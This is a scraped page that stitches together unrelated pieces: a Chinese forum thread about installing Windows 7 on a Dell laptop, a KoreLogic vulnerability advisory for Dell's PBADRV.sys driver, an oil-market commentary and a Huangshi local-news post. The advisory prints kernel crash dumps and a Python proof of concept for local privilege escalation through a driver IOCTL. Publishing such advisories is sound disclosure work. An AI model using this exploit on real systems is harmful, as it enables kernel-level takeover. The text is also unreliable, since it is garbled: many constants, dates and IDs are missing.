来源:蜘蛛抓取(WebSpider)
时间:2016-11-14 05:30
标签:
戴尔inspiron13 5378
查看: 483|回复: 4
有没有学建筑的苦逼m5510如何安装win7,还是不会。
入门会员, 积分 0.1, 距离下一级还需 0.9 积分
技术分0 分
资产值675 nb
联谊分0 分
有没有学建筑的苦逼m5510如何安装win7,还是不会。
入门会员, 积分 0.2, 距离下一级还需 0.8 积分
技术分0 分
资产值1535 nb
联谊分0 分
论坛有教程,而且有人出了集成驱动的win7系统下载
初级会员, 积分 2.5, 距离下一级还需 1.5 积分
技术分1.3 分
资产值8983 nb
联谊分0.1 分
论坛有教程,而且有人出了集成驱动的win7系统下载
入门会员, 积分 0.2, 距离下一级还需 0.8 积分
技术分0 分
资产值1535 nb
联谊分0 分
初级会员, 积分 2.9, 距离下一级还需 1.1 积分
技术分2.7 分
资产值2266 nb
联谊分0 分
技嘉官网那个win7tools,拿去给安装盘打包个nvme和usb3.0驱动 插在5510上开机按f12选择u盘启动就行了
银牌荣誉勋章(注册8年以上会员)
注册8年以上会员
金牌荣誉勋章(注册10年以上会员)
注册10年以上会员
Powered by Discuz! X3.2 &
Comsenz Inc &mailing list archives
KL-001- : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
From: KoreLogic Disclosures &disclosures () korelogic com&
Date: Fri, 18 Dec :06 -0600
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
KL-001- : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
Title: Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
Advisory ID: KL-001-
Publication Date:
Publication URL:
1. Vulnerability Details
Affected Vendor: Dell
Affected Product: Pre-Boot Authentication Driver
Affected Version: 1.0.1.5
Platform: Microsoft Windows XP SP3, Microsoft Windows 2003 SP2,
Microsoft Windows 7
CWE Classification: CWE-20: Improper input validation
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-
2. Vulnerability Description
The Dell Pre-Boot Authentication Driver (PBADRV.sys) contains
a vulnerability that can be leveraged to enable an attacker to
write arbitrary code. The &OutputAddress& from the IOCTL call is
not validated before it attempts to write to memory. The content
of the write is a four-byte hex value that is always greater
than that of the kernel base address. Using multiple writes, it
may be possible to overwrite the first entry of HalDispatchTable
in a way that the entry would point to a user-land address. An
attacker need only allocate shellcode at said address and call
the ntdll!NtQueryIntervalProfile() function.
3. Technical Description
Example against Windows XP:
Microsoft (R) Windows Debugger Version 6.12.
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\WINXP\MEMORY.DMP]
Kernel Complete Dump File: Full address space is available
Symbol search path is: srv*
Executable search path is:
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.6
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x
Debug session time: Tue Feb
3 05:41:17.712 2015 (UTC - 8:00)
System Uptime: 0 days 0:03:46.296
Loading Kernel Symbols
kd& !analyze -v
READ_ADDRESS:
FAULTING_IP:
+2902faf00efdfc0
eax,dword ptr [eax+44h]
MM_INTERNAL_CODE:
DEFAULT_BUCKET_ID:
DRIVER_FAULT
BUGCHECK_STR:
PROCESS_NAME:
pythonw.exe
TRAP_FRAME:
b24bdc8c -- (.trap 0xffffffffb24bdc8c)
eax= ebx=8060ea01 ecx= edx= esi=012c1be8 edi=b24bdd64
eip= esp=b24bdd00 ebp=b24bdd20 iopl=0
nv up ei ng nz na pe nc
eax,dword ptr [eax+44h] ds:d4=????????
Resetting default scope
LAST_CONTROL_TRANSFER:
from 8051cc7f to 804f8cc5
STACK_TEXT:
b24bdc14 090d4
nt!KeBugCheckEx+0x1b
nt!MmAccessFault+0x8e7
b24bdc74 d4
nt!KiTrap0E+0xcc
WARNING: Frame IP not in any known module. Following frames may be wrong.
b24bdcfc 8063d5cd 0000c b24bdd14 0x8
b24bdd20 00002 b24bdd64
nt!KeQueryIntervalProfile+0x37
c1be8 0021f7fc nt!NtQueryIntervalProfile+0x61
b24bdd54 7c90e514 c1be8 0021f7fc nt!KiFastCallEntry+0xf8
7c90d84a 1d1add9a c1be8 ntdll!KiFastSystemCallRet
1d1add9a c1be8 0021f89c ntdll!NtQueryIntervalProfile+0xc
0021f7fc 1d1acab6 1d1ac900 000008 _ctypes!DllCanUnloadNow+0x5b6a
d1a8db8 7c90d83e f7d09f _ctypes!DllCanUnloadNow+0x4886
0021f8dc 1d1a959e c90d83e
_ctypes!DllCanUnloadNow+0xb88
d1a54d8 7c90d83e 012d0 _ctypes!DllCanUnloadNow+0x136e
0021f9dc 1e07cf0c d0 _ctypes+0x54d8
8b 000004bb 88808b00 python27!PyObject_Call+0x4c
STACK_COMMAND:
FOLLOWUP_IP:
nt!KiTrap0E+cc
SYMBOL_STACK_INDEX:
SYMBOL_NAME:
nt!KiTrap0E+cc
FOLLOWUP_NAME:
MachineOwner
MODULE_NAME: nt
IMAGE_NAME:
ntkrnlpa.exe
DEBUG_FLR_IMAGE_TIMESTAMP:
FAILURE_BUCKET_ID:
0x50_nt!KiTrap0E+cc
BUCKET_ID:
0x50_nt!KiTrap0E+cc
Followup: MachineOwner
Example against Windows 7:
Microsoft (R) Windows Debugger Version 6.3. X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\Users\dev\Desktop\Mini.dmp]
Mini Kernel Dump File: Only registers and stack trace are available
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.
* Use .symfix to have the debugger choose a symbol path.
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
* The Symbol Path can be set by:
using the _NT_SYMBOL_PATH environment variable.
using the -y &symbol_path& argument when starting the debugger. *
using .sympath and .sympath+
*********************************************************************
Unable to load image \WINDOWS\system32\ntkrnlpa.exe, Win32 error 0n2
*** WARNING: Unable to verify timestamp for ntkrnlpa.exe
*** ERROR: Module load completed but symbols could not be loaded for ntkrnlpa.exe
Windows Server 2003 Kernel Version 3790 (Service Pack 2) UP Free x86 compatible
Product: Server, suite: Enterprise TerminalServer SingleUserTS
Machine Name:
Kernel base = 0x PsLoadedModuleList = 0x808a1fe8
Debug session time: Thu Sep 17 08:21:15.962 2015 (UTC - 7:00)
System Uptime: 0 days 0:10:19.785
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
* The Symbol Path can be set by:
using the _NT_SYMBOL_PATH environment variable.
using the -y &symbol_path& argument when starting the debugger. *
using .sympath and .sympath+
*********************************************************************
Unable to load image \WINDOWS\system32\ntkrnlpa.exe, Win32 error 0n2
*** WARNING: Unable to verify timestamp for ntkrnlpa.exe
*** ERROR: Module load completed but symbols could not be loaded for ntkrnlpa.exe
Loading Kernel Symbols
...............................................................
............................................................
Loading User Symbols
Loading unloaded module list
*******************************************************************************
Bugcheck Analysis
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 50, {ffffffff, 1, 8}
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
*************************************************************************
*** WARNING: Unable to verify timestamp for hal.dll
*** ERROR: Module load completed but symbols could not be loaded for hal.dll
*** WARNING: Unable to verify timestamp for PBADRV.sys
*** ERROR: Module load completed but symbols could not be loaded for PBADRV.sys
*** WARNING: Unable to verify timestamp for srv.sys
*** ERROR: Module load completed but symbols could not be loaded for srv.sys
*************************************************************************
Probably caused by : PBADRV.sys ( PBADRV+13a0 )
Followup: MachineOwner
kd& ..reload
Loading Kernel Symbols
...............................................................
............................................................
Loading User Symbols
Loading unloaded module list
kd& !analyze -v
*******************************************************************************
Bugcheck Analysis
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.
This cannot be protected by try-except,
it must be protected by a Probe.
Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffffffff, memory referenced.
Arg2: , value 0 = read operation, 1 = write operation.
Arg3: 80820de3, If non-zero, the instruction address which referenced the bad memory
Arg4: , (reserved)
Debugging Details:
------------------
Could not read faulting driver name
Unable to load image \??\C:\Documents and Settings\Administrator\Desktop\PBADRV.sys, Win32 error 0n2
*** WARNING: Unable to verify timestamp for PBADRV.sys
*** ERROR: Module load completed but symbols could not be loaded for PBADRV.sys
WRITE_ADDRESS: GetPointerFromAddress: unable to read from 808a1df0
GetPointerFromAddress: unable to read from 808a1de8
GetUlongFromAddress: unable to read from 808a67f8
FAULTING_IP:
nt!IopCompleteRequest+97
rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE:
CUSTOMER_CRASH_COUNT:
DEFAULT_BUCKET_ID:
DRIVER_FAULT
BUGCHECK_STR:
PROCESS_NAME:
python.exe
CURRENT_IRQL:
ANALYSIS_VERSION: 6.3. (debuggers(dbg).0) x86fre
IRP_ADDRESS: 87c57378
TRAP_FRAME:
ba456a6c -- (.trap 0xffffffffba456a6c)
eax= ebx=87c57378 ecx= edx= esi=88064e50 edi=ffffffff
eip=80820de3 esp=ba456ae0 ebp=ba456b24 iopl=0
nv up ei pl nz na po nc
nt!IopCompleteRequest+0x97:
rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
LAST_CONTROL_TRANSFER:
from 8085b93b to
STACK_TEXT:
nt!KeBugCheckEx+0x1b
nt!MmAccessFault+0xa91
ba456a54 800001 ffffffff
nt!KiTrap0E+0xd8
ba456b24 c573b8 ba456b70 ba456b64 nt!IopCompleteRequest+0x97
ba456b74 80a59f1f 00 nt!KiDeliverApc+0xb8
ba456b94 80a5a153 ba456b01 c573b8 hal!HalpDispatchSoftwareInterrupt+0x49
ba456bb0 80a5a1d0
ba456b00 ba456bd0 hal!HalpCheckForSoftwareInterrupt+0x81
ba456bc0 00000 ba456b00 ba456bf0 hal!KfLowerIrql+0x62
ba456bd0 c573b8 87c00 nt!KiExitDispatcher+0xd3
ba456bf0 8081daa5 87c573b8 87a0cb68
nt!KeInsertQueueApc+0x57
ba456c24 bac57378 87cbb490 87c57378 nt!IopfCompleteRequest+0x201
WARNING: Stack unwind information not available. Following frames may be wrong.
87d13c88 87ccb68 PBADRV+0x13a0
ba456c50 808ef85d 87c573e8 87a0cb68 87c57378 nt!IofCallDriver+0x45
ba456c64 808f05ff 87d13c88 87ccb68 nt!IopSynchronousServiceTail+0x10b
ba456d00 808e912e 00 nt!IopXxxControlFile+0x5e5
ba456d34 00
nt!NtDeviceIoControlFile+0x2a
ba456d34 7c888 00000 nt!KiSystemServicePostCall
00 x7c82845c
STACK_COMMAND:
FOLLOWUP_IP:
PBADRV+13a0
ba5423a0 ??
SYMBOL_STACK_INDEX:
SYMBOL_NAME:
PBADRV+13a0
FOLLOWUP_NAME:
MachineOwner
MODULE_NAME: PBADRV
IMAGE_NAME:
PBADRV.sys
DEBUG_FLR_IMAGE_TIMESTAMP:
FAILURE_BUCKET_ID:
0x50_PBADRV+13a0
BUCKET_ID:
0x50_PBADRV+13a0
ANALYSIS_SOURCE:
FAILURE_ID_HASH_STRING:
km:0x50_pbadrv+13a0
FAILURE_ID_HASH:
{7469b31a-ad45-6d57-3201e}
Followup: MachineOwner
4. Mitigation and Remediation Recommendation
The vendor no longer supports this version, and no known
remediation is available.
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
- KoreLogic sends vulnerability report and PoC to Dell.
- Dell acknowledges receipt of vulnerability report.
- KoreLogic contacts Dell for a progress update and directs
Dell to KoreLogic&s 45 business day disclosure timeline.
- Dell requests additional time to develop remediation.
- KoreLogic asks for an estimate of the timeline for
remediation.
- Dell responds to say they are unable to provide an estimate
for the length of time to develop a mitigation or
remediation strategy.
- 45 business days have elapsed since the vulnerability was
reported to Dell.
- 90 business days have elapsed since the vulnerability was
reported to Dell.
- 120 business days have elapsed since the vulnerability was
reported to Dell.
- KoreLogic requests a CVE from Mitre.
- Mitre issues CVE-.
- KoreLogic requests update from Dell.
- Dell responds to say they are unable to provide an estimate
for the length of time to develop a mitigation or
remediation strategy.
- 150 business days have elapsed since the vulnerability was
reported to Dell.
- KoreLogic notifies Dell the issue will be disclosed publicly
in 10 business days.
- Dell states they are working on a remediation and asks
KoreLogic to continue to hold back public release.
- 180 business days have elapsed since the vulnerability was
reported to Dell.
- Dell responds with the following statement: &The referenced
software component is from an old version of Dell Data
Protection | Authentication that has not been shipped for
some time and is no longer supported. No software updates
are planned at this time.&
- Public disclosure.
7. Proof of Concept
########################################################################
# Copyright 2015 KoreLogic Inc., All Rights Reserved.
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
# Author: Matt Bergin (KoreLogic / Smash the Stack)
# Purpose: Dell PBADRV.sys Privilege Escalation PoC XP SP3
########################################################################
from ctypes import byref, c_int, c_ulong, windll
from sys import exit
CreateFileA, NtAllocateVirtualMemory = windll.kernel32.CreateFileA, windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory, DeviceIoControlFile = windll.kernel32.WriteProcessMemory, windll.ntdll.ZwDeviceIoControlFile
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ, FILE_SHARE_WRITE, OPEN_EXISTING, NULL = 2, 1, 3, 0
handle = CreateFileA(&\\\\.\\PBADRV&, FILE_SHARE_WRITE | FILE_SHARE_READ, 0, None, OPEN_EXISTING, 0, None)
NtAllocateVirtualMemory(-1, byref(c_int(0x1)), 0x0, byref(c_int(0xffff)), 0x1000 | 0x)
WriteProcessMemory(-1, 0x1, &\x90&*0x0, byref(c_int(0)))
DeviceIoControlFile(handle, NULL, NULL, NULL, byref(c_ulong(8)), 0x0022201c, 0x1, 0x258, 0x)
CloseHandle(handle)
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
Our public vulnerability disclosure policy is available at:
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQEcBAEBCAAGBQJWdIB7AAoJEE1lmiwOGYkME7cH/13T9fnDcVjynm4OkHpd1BiN
9xvNtLruxQN12OLJrPKuH/ccp1L33J5YWacPbRt1rffSEFvntv7nD/dIHQFNSvAT
aFrEcjJ0hcj25Xd44IeG9QwP8QB2a4yAG1YLChlUOQwF9KJym1o7RBsAogeCLS+x
heq2hvOOTB+frxfFQX4M1C5Hl/vVdaVELmn6DuvmKqOQbKWoQDPufeUAZIMgDw4b
x3CtCY+WCI8KqhVo5EgA4anwJOKbQ0RSpWbN2KYnHALYuA9ndz5yNknzY82Wbydb
TCDflsijwfdq7kdlIA8HNp/y5Ekfv+G8NtbmugeZ0i4epI8eUZUfjSmSeKn2+rI=
-----END PGP SIGNATURE-----
Current thread:
KL-001- : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address KoreLogic Disclosures (Dec 19) 周二(10月25日)价格亚盘初震荡上行,因伊拉克不愿配合冻产,令原油市场多头再起油价再度跌穿50关口至49.50支撑位。晚间API库存再度来袭,市场预计增加利空原油。 截至北京时间8:30,国际原油价格亚盘初,震荡上行0.03美元,涨幅达0.06%,报50.55美元/桶,破位下行风险犹存。 (美国WTI原油60分钟走势图) API料增加 油价50关口恐再失守 周三(10月26日)北京时间04:30,API将公布原油库存。 周一(10月24日)据外媒调查结果显示,美国上周原油库存料将增加,截至10月21日当周美国原油库存料将增加80万桶,汽油库存将减少130万桶,而精炼油库存则将减少140万桶。 前情回顾:API数据显示,截至10月14日当周,美国原油库存减少378.8万桶,至4.671亿桶。库欣原油库存减少195.5万桶。汽油库存增加92.9万桶,精炼油库存大减231.9万桶。 此外,美元指数周一(10月24日)触及九个月高点,受对美联储(FED)今年将加息的预期以及共和党总统候选人特朗普赢得大选的可能性下降等因素支撑。 综上:虽市场预期增加利空原油,但难保API如同上周三(10月19日)一般反转大幅利多。因此,建议投资者谨慎为主,不过,美元支撑持续上扬,油价承压风险偏空,日内应以为主。 伊拉克或成冻产达成决定因素 冻产协议能否达成一直是原油市场的焦点,从4月起到9月的初步达成意见一致,再到今日的伊拉克矛盾激化不愿配合,冻产协议已然成原油价格后市反弹的重要基石。虽近期,伊拉克与俄罗斯对于冻产有所意见,但整体而言,并未产生不可挽回的后果。 伊拉克石油部长卢艾比表示,伊拉克应得到石油输出国组织(OPEC)原油限产协议的豁免,因该国需要收入来打伊斯兰国战争。 并认为伊拉克作为OPEC的第二大产油国,应与尼日利亚和利比亚一样得到豁免,这引起了市场对限产协议的执行力度表示怀疑。 不过,好消息是,周一(10月24日)俄罗斯能源部长诺瓦克表示,已经与卡塔尔和OPEC秘书长就稳定油市进行了会谈,希望OPEC能在下月举行的政策会议上明确限产协议细节。 综合而言,今日原油价格需要防范API反转的同时,也要注意OPEC冻产协议传闻,油价50关口拉锯从未停止,建议投资者谨慎入市。 转载自官网 ()
欲知更多股市机会,速速关注微信号:股市机会情报(thsjihui)
责任编辑:fk
回复0条,有0人参与
以下网友评论只代表同花顺网友的个人观点,不代表同花顺金融服务网观点。
净额(亿)
同花顺财经官方微信号
手机同花顺财经
炒股必备&同花顺财经
同花顺爱基金
您有什么问题想要告诉我们?
留下您的联系方式,以便我们向您反馈结果
提交成功,感谢您的支持!今个婉婉出差啦
上班的路上
lala感觉自己和这只猫头鹰一样
眼看就要被晒化了
不过和婉婉比起来
还算幸福的
这个天气出门,
不是勇士就是烈士啊!
今个有一个好消息要跟大家分享
超35℃露天作业可享高温津贴
每人每天12元,不发可举报
酷热的天气还在持续,不少岗位的亲需要在高温下工作。
大家在繁忙的工作之余,也别忘记领取自己应得的高温津贴。
“湖北省人社厅将全省高温津贴的发放标准由之前的8元/天提高到12元/天,发放时间也由之前的7、8、9三个月延长到6、7、8、9四个月。
按一个月20个工作日计算:20*4*12元=960元,这可不是一笔小数目哦。
小编滴单位比较人性化
每天都会发点
绿豆汤、西瓜啥的
市劳动监察支队相关负责人提醒
清凉饮料等不能充抵高温津贴。
不知道Boss们看得到不
万一他们装作没看见
投诉电话是:。
9月中下旬菜价将会有所回落
7月初,连续暴雨洪灾来袭,黄石本地蔬菜基地受灾,导致全市蔬菜上涨。黄石市场监测的13个品种蔬菜普遍价格上涨。7月下旬,上海青、小白菜、油麦菜、苕尖等当季叶子菜均价4元到5.5元之间。
近半个月来,市蔬菜办正指挥全市各大蔬菜种植基地抢种补种,生长还需要一段周期。预测9月中下旬,待夏播蔬菜上市,菜价将会有所回落。
此外,东楚晚报记者了解到,全市粮油价格稳定,猪肉和淡水鱼价格略有下降。
园博园生态馆已完成90%
昨日,东楚晚报记者从市园博指挥部获悉,省住建厅组织省园林专家组来黄,对湖北省黄石首届园林博览会建设情况进行了一次专业评审。
据介绍,目前,园博园生态馆整体进度(不含布展工作)已完成90%,计划于8月15日全部完工;17个市州展园,计划投资总额为9000万元,目前已完成总工程量的80%;28个市内展园,计划投资总额为9100万元,目前已完成工程量的90%。
矿物晶体与奇石文化博览园25栋单体建筑全部已完成封顶,现正实施水、电、气的安装及室内简装、外立面装饰、景观绿化工程,8月底投入试运行。
高温用水提示
持续高温天气,我市用水量激增。特别是用水高峰期可能会出现部分区域水压下降的现象。黄石市自来水公司提醒广大市民,遇到用水问题请立即拨打供水服务热线6281234,公司将开足马力、合理调度、满负荷生产,确保市民用水。
谁在6路车上掉了钱包?
还有900多元现金
6路公交车队长周红春致电东楚晚报热线6537777说,有乘客掉了钱包,长时间没人认领,他想通过媒体,找到失主。
周队长告诉记者,26日下午2点多钟,6路车司机郭胜国师傅将车开到了城区终点站黄石客运中心站。郭师傅在打扫公交车内卫生时,捡到了一款黑色钱包。钱包里有数张银行卡,以及900余元现金。
截至27日18时30分,依然没有失主来认领失物。周红春希望失主提供有效证件,及时到黄石客运中心站6路公交调度室认领失物。
送餐员送餐时多找了50元,返回来解释时
叫餐男子竟将钱扔下9楼
黄某今年,家住大冶市东风路街办。26日零时30分许,22岁的黄某在大冶人民医院住院部给一名患病的亲戚陪床,感觉到肚子饿了,便叫了一份38元的外卖。
过了一会儿,40多岁的送餐男子石某将吃的送到后,黄某递给他50元,本应找12元,但石某冒着酷暑工作了一天非常疲惫,一时迷糊,就把50元错当成100元,找了62元给黄某。
石某下楼后,猛然想起找错了钱,立即上楼去,语气平和地跟黄某解释这一情况。
“找错了关我什么事,我又没叫你多找,钱扔了也不给你。”
黄某说着,竟然随手将50元纸币从9楼窗户上扔了下去。
被这一举动惊呆了的石某,生气地回道:
“就当我送餐送给狗吃了。”
双方发生争吵时,黄某抬脚想踢石某,结果重心不稳差点摔一跤。石某赶忙报警。
天气这么热,40多岁的送餐员半夜送餐,容易吗?
天这么热,别火气那么大!
凡事应心平气和,
有理走遍天下,
强词夺理,任性而为终会碰壁。
本期编辑丨李娜
本期校对丨
值班主任丨邹圣旺
本期监制丨朱晓源
商务合作:
QQ:(婉婉)
QQ:(lala)
小编工资已与此赞挂钩,一赞一分钱,求打赏!
本文来自微信公众账号提交,由微讯啦收录,转载请注明出处。
微信扫码 分享文章
